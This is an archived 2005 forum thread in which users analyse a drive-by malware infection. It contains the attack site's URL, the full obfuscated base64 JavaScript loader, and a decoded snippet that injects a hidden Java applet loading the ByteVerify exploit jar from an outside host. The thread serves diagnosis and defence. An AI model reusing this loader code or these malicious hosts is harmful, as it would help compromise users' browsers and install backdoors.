Javasys.exe: More of the same or new?

Discussion in 'Computer Security' started by MaxPower, Sep 4, 2005.

  1. MaxPower

    MaxPower Guest

    After visiting a website I found an executable named
    \WINNT\Java\Javasys.exe running on my system.

    Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
    to access the Internet.

    Just to see what would happen, I allowed it to access the Internet and
    it downloaded another executable, which triggered a Zone Alarm security
    alert:

    "nnnm32 is trying to set 'antivirus' to run each time your computer is
    started".

    Actually the name of nnnm32.exe may vary: in a few tries I saw it named
    comm.exe, ping.exe and so on.

    Allowed to access the Internet, nnnm32.exe downloaded a third
    executable (timer.exe) which in turn tried to access the Internet.

    >From this point on, seemingly no futher change occurred in My Processes

    list within Task Manager.

    I then did a scan for spyware with the latest versions of all the
    following:

    ZoneAlarm 6 Pro
    Ad-Aware 1.06r1 Personal (free)
    SpyBot S&D 1.4
    SpySweeper 4.04
    Spyware Doctor 3.2.1.
    AntiVIR Personal 6.31 (free)

    but none of them found any threat (!)

    A couple of weeks later, after downloading an updated virus definition
    file, I scanned the system again with AntiVIR and this time it found in
    timer.exe a backdoor named BDS/Webdor.AD.1


    My configuration:

    - Windows 2000 Professional SP4, IE6 Security set to "medium";
    - ZoneAlarm Pro 6;
    - AntiVIR Personal Edition 6.31 (free);
    - SpyBot S&D 1.4 w/ Teatimer (resident antispyware).


    For those interested, the URL spreading this malware is the following:

    ***********************************************************
    DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    http://198.88.20.158/gal/403/index.html
    ***********************************************************

    My question is: How can I prevent any executable to install in such an
    insidious way?

    With IE6 Security set to "High" this malware could not install, but of
    course I would like to keep IE6 Security set to "Medium", otherwise
    navigation is most unpractical.

    Thank you in advance for any advice.
     
    MaxPower, Sep 4, 2005
    #1
    1. Advertising

  2. MaxPower

    hatschi Guest

    You can use any website you want. The only thing to care about is:

    I will write this in big letter, that everyone sees the importance...

    DON'T USE THE ADMINISTRATOR ACCOUNT FOR SURFING OR EVEN WORKING!!!

    Only use it to install soft- or hardware. And only that kind of software
    you got from a source you can trust.

    I suggest everyone (EVERYONE) to read a book about security!
     
    hatschi, Sep 4, 2005
    #2
    1. Advertising

  3. MaxPower

    Mark Guest

    MaxPower wrote:
    <snip>.
    >
    >
    > For those interested, the URL spreading this malware is the following:
    >
    > ***********************************************************
    > DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    > http://198.88.20.158/gal/403/index.html
    > ***********************************************************
    >
    > My question is: How can I prevent any executable to install in such an
    > insidious way?
    >
    > With IE6 Security set to "High" this malware could not install, but of
    > course I would like to keep IE6 Security set to "Medium", otherwise
    > navigation is most unpractical.
    >
    > Thank you in advance for any advice.
    >


    Since the attack starts with a javascript, I suspect that disabling
    javascript would be the only sure way of preventing this particular
    attack. No matter what browser you are using. Which of course you do
    by setting your security to high.

    With that said, this particular script seems to be looking for Internet
    Explorer so it may be exploiting a flaw in that particular browser.
    Keep in mind I didn't go through the entire process of infecting my
    machine so I'm not sure about this. But, if this is the case, using a
    different browser may have prevented this particular attack.

    What might be interesting is if anyone knows of something that could
    block 'suspicious looking' scripts without totally disabling javascript.

    I ask because I found the first one to be suspicious mainly because of
    the attempts to obfuscate the code. I.E. it's all smooshed into one
    line and the meat of it is base64 encoded.

    The index.html attempts to download this:

    <SCRIPT language="JavaScript"
    SRC="http://198.88.20.158/iSponsor.js?bannerid=403"></SCRIPT>

    That script is: (line breaks inserted by my news client)

    var b64, f64,d;function a(s){var i;for (i=0;i<s.length;i++)if
    (!s)s=1;return s;}function u(d){var r=new Array; var i=0;while(i
    <d.length){if (d<128){r[r.length]=String.fromCharCode(d);i++;}else
    if((d>191)&&(d<224)){r[r.length]=String.fromCharCode(
    ((d&31)<<6)|(d[i+1]&63));i+=2;}else{r[r.length]=String.fromCharCode(((d&15)<<12)|((d[i+1]&63)<<6)|(d[i+2]&63));i+=3;}}return
    r
    ..join("");}function t(t){var d=new Array;var
    i=0;t=t.replace(/\n|\r/g,"");t=t.replace(/=/g,"");while(i<t.length){d[d.length]=(f64[t.
    charAt(i)]<<2)|(f64[t.charAt(i+1)]>>4);d[d.length]=(((f64[t.charAt(i+1)]&15)<<4)|(f64[t.charAt(i+2)]>>2));d[d.length]=(((f64[t.charA
    t(i+2)]&3)<<6)|(f64[t.charAt(i+3)]));i+=4;}if
    (t.length%4==2)d=d.slice(0, d.length-2);if
    (t.length%4==3)d=d.slice(0,d.length-1);retu
    rn d;}function b(s){var
    b64s='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';b64=[];f64=[];for(var
    i=0;i<b64s.len
    gth;i++){b64=b64s.charAt(i);f64[b64s.charAt(i)]=i;}return
    u(a(t(s)));}eval(b("ZnVuY3Rpb24gX19pbmNyZW1lbnRfY291bnRlcigpe3ZhciBjb3V
    udD05MDEyODM7Y291bnQrKzt9O2Z1bmN0aW9uIF9fX2RvX2NoZWNraW5nKCkgewp2YXIgY2Fwcz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnX19fY19jYXBzJyk7dmFyIGN
    UeXBlPTA7dmFyIHZlcnNpb249MDtpZiAoKHR5cGVvZihjYXBzKSE9J3VuZGVmaW5lZCcpJiYodHlwZW9mKGNhcHMuY29ubmVjdGlvblR5cGUpIT0ndW5kZWZpbmVkJykmJih
    0eXBlb2YoY2Fwcy5nZXRDb21wb25lbnRWZXJzaW9uKSE9J3VuZGVmaW5lZCcpKXsKY1R5cGU9Y2Fwcy5jb25uZWN0aW9uVHlwZTsKdmVyc2lvbj1jYXBzLmdldENvbXBvbmV
    udFZlcnNpb24oJ3swOEIwRTVDMC00RkNCLTExQ0YtQUFBNS0wMDQwMUM2MDg1MDB9JywnQ29tcG9uZW50SUQnKTsKdmFyIHNWZXJzaW9uID0gY2Fwcy5nZXRDb21wb25lbnR
    WZXJzaW9uKCd7MDhCMEU1QzAtNEZDQi0xMUNGLUFBQTUtMDA0MDFDNjA4NTAwfScsJ0NvbXBvbmVudElEJyk7dmFyIHNzOwp2YXIgc3NudW07c3MgPSBzVmVyc2lvbi5zcGx
    pdCgnLCcpO3NzbnVtID0gcGFyc2VJbnQoc3NbMl0pOwppZiAoY2Fwcy5jb25uZWN0aW9uVHlwZT09J21vZGVtJyAmJiBzc251bSA8IDM4MTApewpfX2luY3JlbWVudF9jb3V
    udGVyKCk7ZG9jdW1lbnQud3JpdGUoJycpO31lbHNle2RvY3VtZW50LndyaXRlKCcnKTt9fWVsc2V7c2V0VGltZW91dCgnX19fZG9fY2hlY2tpbmcoKScsMjAwKTt9fTtpZiA
    oKG5hdmlnYXRvci5hcHBOYW1lPT0nTWljcm9zb2Z0IEludGVybmV0IEV4cGxvcmVyJykmJih0eXBlb2YoZG9jdW1lbnQuYWxsKSE9J3VuZGVmaW5lZCcpKXtkb2N1bWVudC5
    3cml0ZSgiPGRpdiBpZD0nX19fY19jYXBzJyBzdHlsZT0nZGlzcGxheTpub25lOyBiZWhhdmlvcjp1cmwoI2RlZmF1bHQjY2xpZW50Y2FwcyknPjwvZGl2PiIpO19fX2RvX2N
    oZWNraW5nKCk7fTtkb2N1bWVudC53cml0ZSgiPCEtLSBQUk9NT1RJT04gQVJFQS0tPiAgICAgIDxkaXYgYWxpZ249J2NlbnRlcic+PGZvbnQgZmFjZT0nQXJpYWwsIEhlbHZ
    ldGljYSwgc2Fucy1zZXJpZicgc2l6ZT0nNCc+PGEgaHJlZj0nJyB0YXJnZXQ9J19ibGFuayc+PC9hPjwvZm9udD48L2Rpdj48IS0tIEVORCAtLT4gICAgICAgICIpOw=="))

    The base64 encoded part roughly decodes to:

    function __increment_counter(){var count=901283;count++;
    };
    function ___do_checking() {
    var caps=document.getElementById('___c_caps');
    var cType=0;var version=0;
    if
    ((typeof(caps)!='undefined')&&(typeof(caps.connectionType)!='undefined')&&(typeof(caps.getComponentVersion)!='undefined')){
    cType=caps.connectionType;
    version=caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}','ComponentID');
    var sVersion =
    caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}','ComponentID');var
    ss;
    var ssnum;ss = sVersion.split(',');ssnum = parseInt(ss[2]);
    if (caps.connectionType=='modem' && ssnum <
    3810){__increment_counter();document.write('');
    }else{document.write('');
    }}else{setTimeout('___do_checking()',200);
    }};
    if ((navigator.appName=='Microsoft Internet
    Explorer')&&(typeof(document.all)!='undefined')){document.write("<div
    id='___c_caps' style='display:none;
    behavior:url(#default#clientcaps)'></div>");___do_checking();
    };
    document.write("<!-- PROMOTION AREA--> <div align='center'><font
    face='Arial, Helvetica, sans-serif' size='4'><a href=''
    target='_blank'></a></font></div><!-- END --> ");

    Keep in mind I'm not a programmer so I don't know exactly what the above
    does, but I just find the obfuscation suspicious.

    --
    Mark
     
    Mark, Sep 4, 2005
    #3
  4. From: "MaxPower" <>

    |
    | After visiting a website I found an executable named
    | \WINNT\Java\Javasys.exe running on my system.
    |
    | Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
    | to access the Internet.
    |
    | Just to see what would happen, I allowed it to access the Internet and
    | it downloaded another executable, which triggered a Zone Alarm security
    | alert:
    |
    | "nnnm32 is trying to set 'antivirus' to run each time your computer is
    | started".
    |
    | Actually the name of nnnm32.exe may vary: in a few tries I saw it named
    | comm.exe, ping.exe and so on.
    |
    | Allowed to access the Internet, nnnm32.exe downloaded a third
    | executable (timer.exe) which in turn tried to access the Internet.
    |
    >> From this point on, seemingly no futher change occurred in My Processes

    | list within Task Manager.
    |
    | I then did a scan for spyware with the latest versions of all the
    | following:
    |
    | ZoneAlarm 6 Pro
    | Ad-Aware 1.06r1 Personal (free)
    | SpyBot S&D 1.4
    | SpySweeper 4.04
    | Spyware Doctor 3.2.1.
    | AntiVIR Personal 6.31 (free)
    |
    | but none of them found any threat (!)
    |
    | A couple of weeks later, after downloading an updated virus definition
    | file, I scanned the system again with AntiVIR and this time it found in
    | timer.exe a backdoor named BDS/Webdor.AD.1
    |
    | My configuration:
    |
    | - Windows 2000 Professional SP4, IE6 Security set to "medium";
    | - ZoneAlarm Pro 6;
    | - AntiVIR Personal Edition 6.31 (free);
    | - SpyBot S&D 1.4 w/ Teatimer (resident antispyware).
    |
    | For those interested, the URL spreading this malware is the following:
    |
    | ***********************************************************
    | DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    | http://198.88.20.158/gal/403/index.html
    | ***********************************************************
    |
    | My question is: How can I prevent any executable to install in such an
    | insidious way?
    |
    | With IE6 Security set to "High" this malware could not install, but of
    | course I would like to keep IE6 Security set to "Medium", otherwise
    | navigation is most unpractical.
    |
    | Thank you in advance for any advice.


    Download MULTI_AV.EXE from the URL --
    http://www.ik-cs.com/programs/virtools/Multi_AV.exe

    It is a self-extracting ZIP file that contains the Kixtart Script Interpreter {
    http://kixtart.org Kixtart is CareWare } three batch files, five Kixtart scripts, one Link
    (.LNK) file, a PDF instruction file and two utilities; UNZIP.EXE and WGET.EXE. It will
    simplify the process of using; Sophos, Trend and McAfee Anti Virus Command Line Scanners to
    remove viruses, Trojans and various other malware.

    C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
    This will bring up the initial menu of choices and should be executed in Normal Mode. This
    way all the components can be downloaded from each AV vendor’s web site.
    The choices are; Sophos, Trend, McAfee, Exit the menu and Reboot the PC.

    You can choose to go to each menu item and just download the needed files or you can
    download the files and perform a scan in Normal Mode. Once you have downloaded the files
    needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
    during boot] and re-run the menu again and choose which scanner you want to run in Safe
    Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

    When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
    file.

    To use this utility, perform the following...
    Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
    Choose; Unzip
    Choose; Close

    Execute; C:\AV-CLS\StartMenu.BAT
    { or Double-click on 'Start Menu' in C:\AV-CLS }

    NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
    FireWall to allow it to download the needed AV vendor related files.

    * * * Please report back your results * * *


    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    http://www.ik-cs.com/got-a-virus.htm
     
    David H. Lipman, Sep 5, 2005
    #4
  5. MaxPower

    Imhotep Guest

    MaxPower wrote:

    >
    > After visiting a website I found an executable named
    > \WINNT\Java\Javasys.exe running on my system.
    >
    > Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
    > to access the Internet.
    >
    > Just to see what would happen, I allowed it to access the Internet and
    > it downloaded another executable, which triggered a Zone Alarm security
    > alert:
    >
    > "nnnm32 is trying to set 'antivirus' to run each time your computer is
    > started".
    >
    > Actually the name of nnnm32.exe may vary: in a few tries I saw it named
    > comm.exe, ping.exe and so on.
    >
    > Allowed to access the Internet, nnnm32.exe downloaded a third
    > executable (timer.exe) which in turn tried to access the Internet.
    >
    >>From this point on, seemingly no futher change occurred in My Processes

    > list within Task Manager.
    >
    > I then did a scan for spyware with the latest versions of all the
    > following:
    >
    > ZoneAlarm 6 Pro
    > Ad-Aware 1.06r1 Personal (free)
    > SpyBot S&D 1.4
    > SpySweeper 4.04
    > Spyware Doctor 3.2.1.
    > AntiVIR Personal 6.31 (free)
    >
    > but none of them found any threat (!)
    >
    > A couple of weeks later, after downloading an updated virus definition
    > file, I scanned the system again with AntiVIR and this time it found in
    > timer.exe a backdoor named BDS/Webdor.AD.1
    >
    >
    > My configuration:
    >
    > - Windows 2000 Professional SP4, IE6 Security set to "medium";
    > - ZoneAlarm Pro 6;
    > - AntiVIR Personal Edition 6.31 (free);
    > - SpyBot S&D 1.4 w/ Teatimer (resident antispyware).
    >
    >
    > For those interested, the URL spreading this malware is the following:
    >
    > ***********************************************************
    > DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    > http://198.88.20.158/gal/403/index.html
    > ***********************************************************
    >
    > My question is: How can I prevent any executable to install in such an
    > insidious way?
    >
    > With IE6 Security set to "High" this malware could not install, but of
    > course I would like to keep IE6 Security set to "Medium", otherwise
    > navigation is most unpractical.
    >
    > Thank you in advance for any advice.



    I went to this site (I use linux/FreeBSD and have java off). Here is some
    info for you:

    The IP address range is owned by Verio. You might want to contact them about
    this server:
    OrgAbuseHandle: VAC5-ARIN
    OrgAbuseName: Verio Abuse Contact
    OrgAbusePhone: +1-800-551-1630
    OrgAbuseEmail:

    After looking at speedslim's records it appears that this is a spoofing
    site...

    Imhotep
     
    Imhotep, Sep 5, 2005
    #5
  6. MaxPower

    Imhotep Guest

    Mark wrote:

    > MaxPower wrote:
    > <snip>.
    >>
    >>
    >> For those interested, the URL spreading this malware is the following:
    >>
    >> ***********************************************************
    >> DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
    >> http://198.88.20.158/gal/403/index.html
    >> ***********************************************************
    >>
    >> My question is: How can I prevent any executable to install in such an
    >> insidious way?
    >>
    >> With IE6 Security set to "High" this malware could not install, but of
    >> course I would like to keep IE6 Security set to "Medium", otherwise
    >> navigation is most unpractical.
    >>
    >> Thank you in advance for any advice.
    >>

    >
    > Since the attack starts with a javascript, I suspect that disabling
    > javascript would be the only sure way of preventing this particular
    > attack. No matter what browser you are using. Which of course you do
    > by setting your security to high.
    >
    > With that said, this particular script seems to be looking for Internet
    > Explorer so it may be exploiting a flaw in that particular browser.
    > Keep in mind I didn't go through the entire process of infecting my
    > machine so I'm not sure about this. But, if this is the case, using a
    > different browser may have prevented this particular attack.
    >
    > What might be interesting is if anyone knows of something that could
    > block 'suspicious looking' scripts without totally disabling javascript.
    >
    > I ask because I found the first one to be suspicious mainly because of
    > the attempts to obfuscate the code. I.E. it's all smooshed into one
    > line and the meat of it is base64 encoded.
    >
    > The index.html attempts to download this:
    >
    > <SCRIPT language="JavaScript"
    > SRC="http://198.88.20.158/iSponsor.js?bannerid=403"></SCRIPT>
    >
    > That script is: (line breaks inserted by my news client)
    >
    > var b64, f64,d;function a(s){var i;for (i=0;i<s.length;i++)if
    > (!s)s=1;return s;}function u(d){var r=new Array; var i=0;while(i
    > <d.length){if (d<128){r[r.length]=String.fromCharCode(d);i++;}else
    > if((d>191)&&(d<224)){r[r.length]=String.fromCharCode(
    > ((d&31)<<6)

    (d[i+1]&63));i+=2;}else{r[r.length]=String.fromCharCode(((d&15)<<12)
    ((d[i+1]&63)<<6)|(d[i+2]&63));i+=3;}}return
    > r
    > .join("");}function t(t){var d=new Array;var
    > i=0;t=t.replace(/\n|\r/g,"");t=t.replace(/=/g,"");while(i<t.length

    {d[d.length]=(f64[t.
    > charAt(i)]<<2)|(f64[t.charAt(i+1)]>>4);d[d.length]=(((f6

    [t.charAt(i+1)]&15)<<4)|(f64[t.charAt(i+2)]>>2));d[d.length]=(((f64[t.charA
    > t(i+2)]&3)<<6)|(f64[t.charAt(i+3)]));i+=4;}if
    > (t.length%4==2)d=d.slice(0, d.length-2);if
    > (t.length%4==3)d=d.slice(0,d.length-1);retu
    > rn d;}function b(s){var
    >

    b64s='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';b64=[];f64=[];for(var
    > i=0;i<b64s.len
    > gth;i++){b64=b64s.charAt(i);f64[b64s.charAt(i)]=i;}return
    > u(a(t(s)));}eval(b("ZnVuY3Rpb24gX19pbmNyZW1lbnRfY291bnRlcigpe3ZhciBjb3V
    >

    udD05MDEyODM7Y291bnQrKzt9O2Z1bmN0aW9uIF9fX2RvX2NoZWNraW5nKCkgewp2YXIgY2Fwcz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnX19fY19jYXBzJyk7dmFyIGN
    >

    UeXBlPTA7dmFyIHZlcnNpb249MDtpZiAoKHR5cGVvZihjYXBzKSE9J3VuZGVmaW5lZCcpJiYodHlwZW9mKGNhcHMuY29ubmVjdGlvblR5cGUpIT0ndW5kZWZpbmVkJykmJih
    >

    0eXBlb2YoY2Fwcy5nZXRDb21wb25lbnRWZXJzaW9uKSE9J3VuZGVmaW5lZCcpKXsKY1R5cGU9Y2Fwcy5jb25uZWN0aW9uVHlwZTsKdmVyc2lvbj1jYXBzLmdldENvbXBvbmV
    >

    udFZlcnNpb24oJ3swOEIwRTVDMC00RkNCLTExQ0YtQUFBNS0wMDQwMUM2MDg1MDB9JywnQ29tcG9uZW50SUQnKTsKdmFyIHNWZXJzaW9uID0gY2Fwcy5nZXRDb21wb25lbnR
    >

    WZXJzaW9uKCd7MDhCMEU1QzAtNEZDQi0xMUNGLUFBQTUtMDA0MDFDNjA4NTAwfScsJ0NvbXBvbmVudElEJyk7dmFyIHNzOwp2YXIgc3NudW07c3MgPSBzVmVyc2lvbi5zcGx
    >

    pdCgnLCcpO3NzbnVtID0gcGFyc2VJbnQoc3NbMl0pOwppZiAoY2Fwcy5jb25uZWN0aW9uVHlwZT09J21vZGVtJyAmJiBzc251bSA8IDM4MTApewpfX2luY3JlbWVudF9jb3V
    >

    udGVyKCk7ZG9jdW1lbnQud3JpdGUoJycpO31lbHNle2RvY3VtZW50LndyaXRlKCcnKTt9fWVsc2V7c2V0VGltZW91dCgnX19fZG9fY2hlY2tpbmcoKScsMjAwKTt9fTtpZiA
    >

    oKG5hdmlnYXRvci5hcHBOYW1lPT0nTWljcm9zb2Z0IEludGVybmV0IEV4cGxvcmVyJykmJih0eXBlb2YoZG9jdW1lbnQuYWxsKSE9J3VuZGVmaW5lZCcpKXtkb2N1bWVudC5
    >

    3cml0ZSgiPGRpdiBpZD0nX19fY19jYXBzJyBzdHlsZT0nZGlzcGxheTpub25lOyBiZWhhdmlvcjp1cmwoI2RlZmF1bHQjY2xpZW50Y2FwcyknPjwvZGl2PiIpO19fX2RvX2N
    >

    oZWNraW5nKCk7fTtkb2N1bWVudC53cml0ZSgiPCEtLSBQUk9NT1RJT04gQVJFQS0tPiAgICAgIDxkaXYgYWxpZ249J2NlbnRlcic+PGZvbnQgZmFjZT0nQXJpYWwsIEhlbHZ
    >

    ldGljYSwgc2Fucy1zZXJpZicgc2l6ZT0nNCc+PGEgaHJlZj0nJyB0YXJnZXQ9J19ibGFuayc+PC9hPjwvZm9udD48L2Rpdj48IS0tIEVORCAtLT4gICAgICAgICIpOw=="))
    >
    > The base64 encoded part roughly decodes to:
    >
    > function __increment_counter(){var count=901283;count++;
    > };
    > function ___do_checking() {
    > var caps=document.getElementById('___c_caps');
    > var cType=0;var version=0;
    > if
    >

    ((typeof(caps)!='undefined')&&(typeof(caps.connectionType)!='undefined')&&(typeof(caps.getComponentVersion)!='undefined')
    {
    > cType=caps.connectionType;
    >

    version=caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}','ComponentID');
    > var sVersion =
    >

    caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}','ComponentID');var
    > ss;
    > var ssnum;ss = sVersion.split(',');ssnum = parseInt(ss[2]);
    > if (caps.connectionType=='modem' && ssnum <
    > 3810){__increment_counter();document.write('');
    > }else{document.write('');
    > }}else{setTimeout('___do_checking()',200);
    > }};
    > if ((navigator.appName=='Microsoft Internet
    > Explorer')&&(typeof(document.all)!='undefined')){document.write("<div
    > id='___c_caps' style='display:none;
    > behavior:url(#default#clientcaps)'></div>");___do_checking();
    > };
    > document.write("<!-- PROMOTION AREA--> <div align='center'><font
    > face='Arial, Helvetica, sans-serif' size='4'><a href=''
    > target='_blank'></a></font></div><!-- END --> ");
    >
    > Keep in mind I'm not a programmer so I don't know exactly what the above
    > does, but I just find the obfuscation suspicious.
    >
    > --
    > Mark



    ....good job....

    Im
     
    Imhotep, Sep 5, 2005
    #6
  7. MaxPower

    Imhotep Guest

    hatschi wrote:

    > You can use any website you want. The only thing to care about is:
    >
    > I will write this in big letter, that everyone sees the importance...
    >
    > DON'T USE THE ADMINISTRATOR ACCOUNT FOR SURFING OR EVEN WORKING!!!
    >
    > Only use it to install soft- or hardware. And only that kind of software
    > you got from a source you can trust.
    >
    > I suggest everyone (EVERYONE) to read a book about security!


    Yup! Good advice...
     
    Imhotep, Sep 5, 2005
    #7
  8. MaxPower

    Ant Guest

    "Mark" wrote:

    > MaxPower wrote:


    >> My question is: How can I prevent any executable to install in such an
    >> insidious way?


    Keep up to date with your security patches, or don't use IE, and don't
    visit such dubious sites.

    >> With IE6 Security set to "High" this malware could not install, but of
    >> course I would like to keep IE6 Security set to "Medium", otherwise
    >> navigation is most unpractical.


    In this particular case you could disable Java and lose very little
    functionality. Note that Java is not the same thing as Javascript.
    Sites tend not to use Java applets for navigation. However, the site
    looks decidedly dodgy, so there could be other exploits lurking there
    (e.g. for Active-X).

    > Since the attack starts with a javascript, I suspect that disabling
    > javascript would be the only sure way of preventing this particular
    > attack. No matter what browser you are using. Which of course you do
    > by setting your security to high.
    >
    > With that said, this particular script seems to be looking for Internet
    > Explorer so it may be exploiting a flaw in that particular browser.


    Or possibly any browser that uses an exploitable Java virtual machine.

    [snip]

    > The base64 encoded part roughly decodes to:
    >
    > function __increment_counter(){var count=901283;count++;
    > };


    That's strange, I decoded the following for the above function
    ("document.write" line wrapped, and http munged to h--p)

    function __increment_counter() {
    document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
    codebase=\"h--p://209.190.137.29/user/ds/\"
    CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
    <param name=\"userid\" value=\"global/ds-1\"></APPLET>");};

    The file c.jar is a Java archive (a zip file) containing:

    BB.class
    Beyond.class
    BeyondInterface.class
    Dummy.class
    Manifest.mf
    VerifierBug.class

    The file VerifierBug.class contains the Java byte verify exploit
    (Troj/BytVrfy-A) according to Sophos. Once this runs, your system is
    open for the site to install its payload. I didn't dig further into
    the site's code to see what that malware might be.
     
    Ant, Sep 5, 2005
    #8
  9. From: "Ant" <>


    < snip>

    | The file c.jar is a Java archive (a zip file) containing:
    | BB.class
    | Beyond.class
    | BeyondInterface.class
    | Dummy.class
    | Manifest.mf
    | VerifierBug.class
    |
    | The file VerifierBug.class contains the Java byte verify exploit
    | (Troj/BytVrfy-A) according to Sophos. Once this runs, your system is
    | open for the site to install its payload. I didn't dig further into
    | the site's code to see what that malware might be.
    |

    McAfee as well...
    9/5/2005 6:35:38 PM Deleted (Clean failed) DLIPMAN-1\lipman D:\temp\IE6\Temporary Internet
    Files\Content.IE5\WCZFECUD\c[1].jar\C[1].JAR Exploit-ByteVerify

    and

    9/5/2005 6:38 PM Infected DLIPMAN-1\lipman C:\Documents and
    Settings\lipman\Desktop\VerifierBug.class Exploit-ByteVerify (Trojan) (Removable)

    Another case of a .CLASS file in a Java Jar (ZIP type file) having an infector. This is why
    you must enable "scan archive files" in any/all anti virus products.

    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    http://www.ik-cs.com/got-a-virus.htm
     
    David H. Lipman, Sep 5, 2005
    #9
  10. MaxPower

    Mark Guest

    Ant wrote:
    >
    >>>With IE6 Security set to "High" this malware could not install, but of
    >>>course I would like to keep IE6 Security set to "Medium", otherwise
    >>>navigation is most unpractical.

    >
    >
    > In this particular case you could disable Java and lose very little
    > functionality. Note that Java is not the same thing as Javascript.
    > Sites tend not to use Java applets for navigation. However, the site
    > looks decidedly dodgy, so there could be other exploits lurking there
    > (e.g. for Active-X).
    >


    Much better put than what I was trying to say.

    >
    >>
    >>With that said, this particular script seems to be looking for Internet
    >>Explorer so it may be exploiting a flaw in that particular browser.

    >
    >
    > Or possibly any browser that uses an exploitable Java virtual machine.


    True, I was just guessing because the javascript I downloaded appeared
    to be looking for Internet Explorer.

    >
    > [snip]
    >
    >
    >>The base64 encoded part roughly decodes to:
    >>
    >>function __increment_counter(){var count=901283;count++;
    >>};

    >
    >
    > That's strange, I decoded the following for the above function
    > ("document.write" line wrapped, and http munged to h--p)
    >
    > function __increment_counter() {
    > document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
    > codebase=\"h--p://209.190.137.29/user/ds/\"
    > CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
    > <param name=\"userid\" value=\"global/ds-1\"></APPLET>");};
    >


    That is quite interesting. From what you saw, does the method of
    getting the script change which script you get? What you got looks much
    more interesting.

    All I did was "wget http://198.88.20.158/iSponsor.js" from one of my
    linux boxes. In all honesty, I was being lazy and probably shouldn't
    have posted without all the information.

    --
    Mark
     
    Mark, Sep 6, 2005
    #10
  11. MaxPower

    Ant Guest

    "Mark" wrote:

    > Ant wrote:
    >> That's strange, I decoded the following for the above function
    >> ("document.write" line wrapped, and http munged to h--p)
    >>
    >> function __increment_counter() {
    >> document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
    >> codebase=\"h--p://209.190.137.29/user/ds/\"
    >> CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
    >> <param name=\"userid\" value=\"global/ds-1\"></APPLET>");};

    >
    > That is quite interesting. From what you saw, does the method of
    > getting the script change which script you get?


    It could do, depending on how the server is set up to respond to your
    HTTP request headers. For example, some will serve different content
    based on the "User-Agent" field. I only tried one method, which was to
    prefix "view-source:" to the URL in the IE address box. This just
    fetches (GETs) the item into notepad without running or rendering
    anything in the browser.

    > All I did was "wget h--p://198.88.20.158/iSponsor.js" from one of my
    > linux boxes.


    That's the same URL I used (without the "?bannerid=403" after it).
    Perhaps the site doesn't like wget, perhaps iSponsor.js changes from
    time to time, or perhaps it's something else I don't know about. You
    could tell wget to use a User-Agent string like IE or Mozilla sends,
    and see if it makes a difference.

    > In all honesty, I was being lazy and probably shouldn't
    > have posted without all the information.


    Not at all; you sparked my interest to find an exploit!
     
    Ant, Sep 6, 2005
    #11
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. This Old Man
    Replies:
    4
    Views:
    681
    This Old Man
    Oct 20, 2003
  2. Marc Schwartz
    Replies:
    0
    Views:
    496
    Marc Schwartz
    Jun 18, 2005
  3. Retnev

    Javasys

    Retnev, Jul 25, 2004, in forum: Computer Security
    Replies:
    1
    Views:
    498
    Newman
    Jul 26, 2004
  4. vb

    javasys.exe

    vb, Oct 7, 2004, in forum: Computer Security
    Replies:
    3
    Views:
    474
    David H. Lipman
    Oct 9, 2004
  5. =?Utf-8?B?Um90ZW0gQXJub24=?=

    logonui.exe and lsass.exe cpu usage when more than 20 user account

    =?Utf-8?B?Um90ZW0gQXJub24=?=, Feb 5, 2007, in forum: Windows 64bit
    Replies:
    5
    Views:
    2,166
    Dshai
    Feb 7, 2007
Loading...

Share This Page